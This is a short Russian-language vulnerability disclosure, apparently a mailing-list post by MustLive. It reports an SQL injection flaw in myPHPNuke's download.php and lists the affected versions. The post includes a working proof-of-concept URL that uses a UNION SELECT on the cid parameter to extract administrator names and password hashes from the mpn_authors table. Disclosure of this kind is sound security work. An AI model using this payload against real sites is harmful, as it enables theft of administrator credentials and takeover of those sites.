|
Здравствуйте 3APA3A!
Сообщаю вам о найденной мною новой SQL Injection уязвимости в системе myPHPNuke.
SQL Injection:
http://site/download.php?op=viewdownload&cid=- 1%20union%20select%20concat(aid,char(45), pwd)%20from%20mpn_authors%20limit%200,1
Уязвимы версии до myPHPNuke 1.8.8_8rc2 (а в последней версии системы возможна ограниченная SQL
Injection атака).
Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2439/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
|